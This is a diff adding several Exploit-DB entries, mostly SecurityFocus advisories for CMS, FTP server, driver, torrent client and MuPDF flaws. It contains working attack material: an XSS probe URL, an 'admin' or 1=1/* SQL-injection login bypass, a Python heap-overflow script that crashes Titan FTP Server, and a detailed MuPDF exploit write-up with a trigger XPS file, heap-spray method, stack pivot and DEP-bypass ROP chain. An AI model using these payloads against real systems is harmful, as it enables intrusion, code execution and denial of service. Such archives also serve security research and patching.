 CruxCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 CruxCMS 3.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/search.php?search="><script>alert(/vuln/)</script> 
--- a/platforms/php/webapps/31098.txt
+++ b/platforms/php/webapps/31098.txt
@ -0,0 +1,17 @@
 source: http://www.securityfocus.com/bid/27589/info
 Simple OS CMS is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
 A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Simple OS CMS 0.1c beta is vulnerable; other versions may also be affected. 
 The following exploit information is available:
 Passing:
 username: admin' or 1=1/*
 password: something
 will bypass the authentication process. 
--- a/platforms/php/webapps/31099.txt
+++ b/platforms/php/webapps/31099.txt
@ -0,0 +1,16 @@
 source: http://www.securityfocus.com/bid/27592/info
 Codice CMS is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
 A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 The following exploit information is available:
 Passing:
 username: admin' or 1=1/*
 password: something
 will bypass the authentication process.
--- a/platforms/php/webapps/31101.txt
+++ b/platforms/php/webapps/31101.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27598/info
 HispaH Youtube Clone is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the context of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 http://www.example.com/youtube/siteadmin/editor_files/includes/load_message.php?lang[please_wait]=[XSS] 
--- a/platforms/windows/dos/30934.txt
+++ b/platforms/windows/dos/30934.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27021/info
 Total Player is prone to a denial-of-service vulnerability.
 An attacker can exploit this issue to crash the application. Given the nature of this issue, the attacker may be able to execute arbitrary code, but this has not been confirmed.
 This issue is reported to affect Total Player 3.0; other versions may also be vulnerable.
 http://www.exploit-db.com/sploits/30934.m3u
--- a/platforms/windows/dos/31105.py
+++ b/platforms/windows/dos/31105.py
@ -0,0 +1,42 @@
 source: http://www.securityfocus.com/bid/27611/info
 Titan FTP Server is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
 An attacker may exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service.
 This issue affects Titan FTP Server 6.05 build 550; other versions may also be vulnerable. 
 #!/usr/bin/python
 #
 # First of all, thanks to my wife Edita.
 #
 # Heap overflow in Titan FTP Server version 6.05 build 550
 # (DELE ) - probably other commands are vulnerable too
 # PoC tested on WinXP sp1
 # EAX and ESI are overwritten with 41414141 and 44444444
 #
 # Greetz to muts, m1k1, bolexxx
 # and crew from offsec, remote-exploit.org, Cedes.ba, Itas and Cikom :)
 #
 # Coded by Muris Kurgas a.k.a j0rgan < muris [at] cg [dot] yu >
 import socket
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 print "\nSaljem zli bafer..."
 buffer = '\x90' * 20519 + "A" * 4  + "D" * 4 + "B" * 55000
 s.connect(('192.168.1.9',21))
 data = s.recv(1024)
 s.send('USER ftp' +'\r\n')
 data = s.recv(1024)
 s.send('PASS ftp' +'\r\n')
 data = s.recv(1024)
 print "\nBum! Bum! Bum! :)"
 s.send('DELE ' +buffer+'\r\n')
 s.close()
 be safe,
 j0rgan
--- a/platforms/windows/local/30999.txt
+++ b/platforms/windows/local/30999.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/27179/info
 Creative Ensoniq PCI ES1371 WDM drivers are prone to a local privilege-escalation vulnerability.
 Successful exploits allow local users to execute arbitrary machine code with kernel-level privileges, facilitating the complete compromise of affected computers.
 This issue occurs when the vulnerable driver is running in a Microsoft Windows Vista environment. This occurs in VMware Server and Workstation environments when running Microsoft Vista guest operating systems with sound enabled.
 This issue affects 'es1371mp.sys' 5.1.3612.0. Given the nature of the issue, other device drivers and versions may also be vulnerable, but this has not been confirmed. 
 http://www.exploit-db.com/sploits/30999.zip
--- a/platforms/windows/local/31090.txt
+++ b/platforms/windows/local/31090.txt
@ -0,0 +1,349 @@
 =============================================================
 0day - MuPDF Stack-based Buffer Overflow in xps_parse_color()
 =============================================================
 # Date of discovery: 2013-01-26
 # Software Links: http://www.mupdf.com/ ; http://en.wikipedia.org/wiki/MuPDF
 # Version: <= 1.3
 # Author: Jean-Jamil Khalife
 # Tested on: Windows XP SP3 (fr) / Windows 7 x64 (fr)
 # Home: http://www.hdwsec.fr
 # Blog : http://www.hdwsec.fr/blog.html
 Proof of Concept: http://www.exploit-db.com/sploits/31090.xps
 Description :
 ==============
 This vulnerability leads to a remote code execution when a user opens a
 malicious XPS document.
 Disclosure Timeline :
 =====================
 2014-01-16 MuPDF contacted
 2014-01-18 fix integrated
 Analysis :
 ==========
 When MuPDF loads the XPS document, it loads the first page and parses
 each element via xps_parse_element() as detailed in the XPS
 specification (
 http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-388.pdf ),
 When the crash occurs, the call stack looks like this :
 <code>
 mupdf.exe!xps_parse_path
 mupdf.exe!xps_parse_element
 mupdf.exe!xps_parse_fixed_page
 mupdf.exe!xps_run_page
 mupdf.exe!fz_run_page_contents
 mupdf.exe!pdfapp_loadpage
 </code>
 <code>
 void
 xps_parse_element(xps_document *doc, const fz_matrix *ctm, const fz_rect
 *area, char *base_uri, xps_resource *dict, fz_xml *node )
 {
 .............
 if (!strcmp(fz_xml_tag(node), "Path"))
 xps_parse_path(doc, ctm, base_uri, dict, node);
 if (!strcmp(fz_xml_tag(node), "Glyphs"))
 xps_parse_glyphs(doc, ctm, base_uri, dict, node);
 .............
 }
 </code>
 In this case, the Path element is parsed via the xps_parse_path()
 function which allows extraction of the attributes and extended
 attributes (Clip, Data, Fill, ...).
 If some conditions are fulfilled, we can trigger a stack overflow in the
 xps_parse_color() function when it parses the value "ContextColor" of
 the attribute "Fill".
 <code>
 void
 xps_parse_path(xps_document *doc, const fz_matrix *ctm, char *base_uri,
 xps_resource *dict, fz_xml *root)
 {
 fz_stroke_state *stroke = NULL;
 fz_matrix transform;
 float samples[32];
 fz_colorspace *colorspace;
 fz_path *path;
 fz_path *stroke_path = NULL;
 fz_rect area;
 int fill_rule;
 int dash_len = 0;
 fz_matrix local_ctm;
 .......
 fill_att = fz_xml_att(root, "Fill");
 .......
 if (fill_att)
 {
 xps_parse_color(doc, base_uri, fill_att, &colorspace, samples);
 if (fill_opacity_att)
 samples[0] *= fz_atof(fill_opacity_att);
 xps_set_color(doc, colorspace, samples);
 fz_fill_path(doc->dev, path, fill_rule == 0, &local_ctm,
 doc->colorspace, doc->color, doc->alpha);
 }
 .......
 }
 </code>
 This function is in charge of getting all the floating numbers of
 ContextColor and putting them into the samples[32] buffer. The issue is
 that it does it without controlling the size of this array.
 <code>
 void
 xps_parse_color(xps_document *doc, char *base_uri, char *string,
 fz_colorspace **csp, float *samples)
 {
 .............
 else if (strstr(string, "ContextColor ") == string)
 {
 fz_strlcpy(buf, string, sizeof buf);
 profile = strchr(buf, ' ');
 if (!profile)
 {
 fz_warn(doc->ctx, "cannot find icc profile uri in '%s'", string);
 return;
 }
 *profile++ = 0;
 p = strchr(profile, ' ');
 if (!p)
 {
 fz_warn(doc->ctx, "cannot find component values in '%s'", profile);
 return;
 }
 *p++ = 0;
 n = count_commas(p) + 1;
 i = 0;
 while (i < n)
 {
 samples[i++] = fz_atof(p);
 p = strchr(p, ',');
 if (!p)
 break;
 p ++;
 if (*p == ' ')
 p ++;
 }
 }
 .............
 }
 </code>
 This is the assembly code from the compiled C code above :
 <code>
 .text:0047C590 loc_47C590:
 .text:0047C590 push esi ; char *
 .text:0047C591 call fz_atof // convert into float
 .text:0047C596 fstp dword ptr [edi+ebx*4]
 .text:0047C599 add esp, 4
 .text:0047C59C push 2Ch ; int
 .text:0047C59E push esi ; char *
 .text:0047C59F add ebx, 1
 .text:0047C5A2 call _strchr // search next comma
 .text:0047C5A7 mov esi, eax
 .text:0047C5A9 add esp, 8
 .text:0047C5AC test esi, esi // check if the returned pointer is null
 .text:0047C5AE jz short loc_47C5C1
 .text:0047C5B0 add esi, 1
 .text:0047C5B3 cmp byte ptr [esi], 20h // trim potential space
 .text:0047C5B6 jnz short loc_47C5BB
 .text:0047C5B8 add esi, 1
 .text:0047C5BB
 .text:0047C5BB loc_47C5BB:
 .text:0047C5BB cmp ebx, ebp // check only the number of comma (oops...
 no test for the samples size)
 .text:0047C5BD jl short loc_47C590
 </code>
 This is an example of a proof-of-concept test case that triggers the
 overflow :
 <code>
 <FixedPage Width="793.76" Height="1122.56"
 xmlns="http://schemas.microsoft.com/xps/2005/06" xml:lang="und">
 <Path Data="" Fill="ContextColor
 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47"
 />
 </FixedPage>
 </code>
 Exploitation :
 ==============
 I decided to use the latest version of the executable provided on the
 official website.
 Software : MuPDF v1.3
 Tested on : Windows XP SP3 (fr) / Windows 7 x64 (fr)
 1) It doesn't matter if the executable is compiled with /GS (this is the
 case on mupdf.exe). The reason is that the stack concerns a float array
 and an old version of Visual Studio doesn't add security cookies in this
 case.
 If it was the case the vulnerability would be more difficult to exploit.
 We can't erase the SEH because of the small stack buffer but depending
 on the concerned software, it maybe possible to replace interesting
 variables or structures values to control the EIP.
 2) Given that samples is a float array, we have to make our payload
 fit into an array of floats.
 The size of the temporary buffer is limited to 0x400 bytes as can be
 seen in fz_strlcpy(...). As said above, we have to make our payload fit
 into an array of floats. For this reason it's important that each float
 has a long ansi size (about 22 bytes), otherwise it could be not precise
 enough to get the real 4-bytes values. So, 1024 / 22 = 46 * 4 bytes =
 184 bytes (not enough to put our shellcode).
 Here is an example :
 <FixedPage Width="793.76" Height="1122.56"
 xmlns="http://schemas.microsoft.com/xps/2005/06" xml:lang="und">
 <Path Data="" Fill="ContextColor
 7.738695572473460e+033,7.738695572473460e+033,7.813604562190658e+033,7.188661121986312e-043,7.861639730565029e+033,8.968310171678829e-044,
 ...... and so on. />
 </FixedPage>
 3) We need to write our shellcode into the heap, so maybe we could put a
 stack pivot to return at the beginning of the stack buffer, process the
 ROP chain and then do an egg hunter to execute the shellcode from the
 heap but there is a much nicer solution.
 It's possible to trigger multiple aligned allocations into the heap,
 even if we can't use javascript scripting routine. I used the "font"
 attribute to allocate binary data, controlling the size for each of them
 else it's not possible to make precise allocations. So we can now put
 the ROP and shellcode directly at 0x0c0c0c0c.
 If we take a look at the assembly code, the functions displayed below
 are used to do most of the allocations of elements and resources :
 <code>
 .text:00421BCC loc_421BCC:
 .text:00421BCC mov edi, [esp+18h]
 .text:00421BD0 mov eax, [esi+44h]
 .text:00421BD3 call sub_40F730
 .text:00421BD8 mov edi, [esp+1Ch]
 .text:00421BDC lea ebx, [edi+1] // ebx = 0x100000 (1mo)
 .text:00421BDF test ebx, ebx // check the size
 .text:00421BE1 mov [ebp+0], eax
 .text:00421BE4 mov [ebp+4], edi
 .text:00421BE7 mov esi, [esi+44h]
 .text:00421BEA jnz short loc_421BFD
 .text:00421BEC xor eax, eax
 .text:00421BEE
 .text:00421BEE loc_421BEE: ; CODE XREF: .text:00421C06_j
 .......
 .text:00421BFD
 .text:00421BFD loc_421BFD: ; CODE XREF: .text:00421BEA_j
 .text:00421BFD mov eax, esi
 .text:00421BFF call do_scavenging_malloc // go malloc
 .text:00421C04 test eax, eax
 .text:00421C06 jnz short loc_421BEE
 .text:00421C08 push ebx
 .text:00421C09 push offset aMallocOfDBytes ; "malloc of %d bytes failed"
 .text:00421C0E lea ecx, [eax+1]
 .text:00421C11 call sub_40FAD0
 </code>
 No particular check is made except if the size is null or zero.
 Obviously, if it's zero, the function returns null.
 ebx contains the size of our block (0x100000).
 <code>
 .text:0040F450 do_scavenging_malloc proc near
 .text:0040F450 push ecx
 .text:0040F451 push esi
 ...
 .text:0040F470
 .text:0040F470 loc_40F470:
 .text:0040F470 mov eax, [esi]
 .text:0040F472 mov ecx, [eax]
 .text:0040F474 mov edx, [eax+4] // & _sub_40F7A0()
 .text:0040F477 push ebx // size = 0x100000
 .text:0040F478 push ecx
 .text:0040F479 call edx // call _sub_40F7A0()
 </code>
 As we can see, __cdecl sub_40F7A0 is dynamically resolved and then
 called with the size argument filled in ebx before.
 <code>
 .text:0040F7A0 ; int __cdecl sub_40F7A0(int, size_t)
 .text:0040F7A0
 .text:0040F7A0 mov eax, [esp+arg_4]
 .text:0040F7A4 push eax ; size_t
 .text:0040F7A5 call _malloc // do HeapAlloc() of our font size
 .text:0040F7AA add esp, 4
 .text:0040F7AD retn
 .text:0040F7AD sub_40F7A0 endp
 </code>
 Finally, our font allocations are done and will remain without being freed.
 Practically, we need to generate many font files containing our binary
 data into a folder and write the path of each of them into the page file
 using FontUri attribute of Glyphs like shown below to load them.
 <code>
 <FixedPage Width="793.76" Height="1122.56"
 xmlns="http://schemas.microsoft.com/xps/2005/06" xml:lang="und">
 <Glyphs OriginX="96" OriginY="96" UnicodeString="This is Page 1!"
 FontUri="/Documents/1/Resources/Fonts/FONT-0.ttf" FontRenderingEmSize="16"/>
 <Glyphs OriginX="96" OriginY="96" UnicodeString="This is Page 1!"
 FontUri="/Documents/1/Resources/Fonts/FONT-1.ttf" FontRenderingEmSize="16"/>
 <Glyphs OriginX="96" OriginY="96" UnicodeString="This is Page 1!"
 FontUri="/Documents/1/Resources/Fonts/FONT-2.ttf" FontRenderingEmSize="16"/>
 ...
 <Path Data="" Fill="ContextColor
 5.962129799535157e-039,7.421697056603529e-039,7.334452214214666e-039, ... />
 </FixedPage>
 </code>
 4)It now only remains to find a solution to bypass DEP. ASLR can be
 bypassed in this case because mupdf.exe isn't ASLR compiled.
 * A stack pivot will allow executing the ROP from the heap
 <code>
 0x005000a7 : # XOR EAX,EAX # POP ESI # RETN
 0x0C0C0C0C : 0x0C0C0C0C
 0x00453eaa : # ADD EAX,ESI # POP ESI # POP ECX # RETN
 0x0C0C0C0C : 0x0C0C0C0C
 0x0C0C0C0C : 0x0C0C0C0C
 0x0047033d : # XCHG EAX,ESP # POP EBP # POP ESI # POP EBX # RETN
 </code>
 * The ROP chain is based on mupdf.exe (which is non-ASLR). In this case,
 it appears that only VirtualAlloc is necessary to bypass DEP.
 <code>
 0x0040ebfe, # POP EAX # RETN
 0x0050d0ac, # ptr to &VirtualAlloc()
 0x004fdd78, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN
 0x41414141, # Filler (compensate)
 0x00408e96, # XCHG EAX,ESI # RETN
 0x004baf26, # POP EBP # RETN
 0x0046521a, # & call esp
 0x00421d9e, # POP EBX # RETN
 0x00000001, # 0x00000001
 0x004fff88, # POP EDX # RETN
 0x00001000, # 0x00001000
 0x0048ab04, # POP ECX # RETN
 0x00000040, # 0x00000040
 0x00472066, # POP EDI # RETN
 0x00500681, # RETN (ROP NOP)
 0x0050be74, # POP EAX # RETN
 0x90909090, # NOP
 0x004d99ac, # PUSHAD # RETN
 </code>
 Conclusion :
 ============
 The MuPDF library is vulnerable to a stack overflow and could be
 exploited in this case because of two conditions :
 1) the binary is non-aslr compiled allowing us to easily get a ROP chain
 and bypass DEP protection
 2) it was compiled with /GS, maybe with an old version of Visual Studio
 which doesn't protect arrays of floats with stack cookies.
--- a/platforms/windows/remote/31032.txt
+++ b/platforms/windows/remote/31032.txt
@ -0,0 +1,17 @@
 source: http://www.securityfocus.com/bid/27321/info
 BitTorrent and uTorrent are prone to a remote code-execution vulnerability because the applications fail to perform adequate boundary checks on user-supplied data.
 Attackers can exploit this issue to execute arbitrary code in the context of the application or to crash the affected application, denying service to legitimate users.
 This issue affects the following versions:
 BitTorrent 6.0
 uTorrent 1.7.5
 uTorrent 1.8-alpha-7834
 Earlier versions may be affected as well.
 UPDATE (January 24, 2008): This issue was originally documented as a denial-of-service issue, but reliable reports suggest that this issue can be exploited to execute arbitrary code. 
 http://www.exploit-db.com/sploits/31032.zip